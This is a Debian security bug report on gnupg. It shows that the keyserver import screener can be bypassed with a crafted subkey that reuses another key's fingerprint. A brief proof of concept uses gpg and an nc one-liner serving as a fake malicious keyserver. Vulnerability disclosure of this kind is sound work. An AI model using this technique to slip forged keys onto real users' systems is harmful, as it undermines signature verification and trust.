Package: gnupg Version: 2.1.18-8~deb9u2 Tags: security
To fix #725411, an import screener was implemented, which rejects keys with fingerprints other than those that were requested by user.
Unfortunately, it's possible to bypass the import screener by appending a crafted subkey to an arbitrary key:
$ gpg --keyserver keyserver.ubuntu.com --recv-key
0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key CCD2ED94D21739E9: public key "Daniel Kahn Gillmor
<d...@fifthhorseman.net>" imported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1
$ (printf 'HTTP/1.0 200 OK\n\n'; cat fakeCCD2ED94D21739E9.pgp) | nc.openbsd -N -l -p
11371 > /dev/null & # poor man's malicious key server
$ gpg --keyserver localhost --recv-key
0EE5BE979282D80B9F7540F1CCD2ED94D21739E9
gpg: key 60B0EEAA28CB19E1: "Totally Legit Signing Key <mall...@example.org>"
not changed
gpg: Total number processed: 1
gpg: unchanged: 1
$ gpg --list-packets fakeCCD2ED94D21739E9.pgp | tail -n6
# off=402 ctb=b9 tag=14 hlen=3 plen=525
:public sub key packet:
version 4, algo 1, created 1180812858, expires 0
pkey[0]: [4096 bits]
pkey[1]: [17 bits]
keyid: CCD2ED94D21739E9
The subkey was made by taking the original key's public key and changing
the packet's tag, so it has the same fingerprint as the original key.
-- System Information: Architecture: amd64 Versions of packages gnupg depends on: ii gnupg-agent 2.1.18-8~deb9u2 ii libassuan0 2.4.3-2 ii libbz2-1.0 1.0.6-8.1 ii libc6 2.24-11+deb9u3 ii libgcrypt20 1.7.6-2+deb9u3 ii libgpg-error0 1.26-2 ii libksba8 1.3.5-2 ii libreadline7 7.0-3 ii libsqlite3-0 3.16.2-5+deb9u1 ii zlib1g 1:1.2.8.dfsg-5 Versions of packages gnupg recommends: ii dirmngr 2.1.18-8~deb9u2 pn gnupg-l10n <none> -- Jakub Wilk
fakeCCD2ED94D21739E9.pgp
Description: Binary data
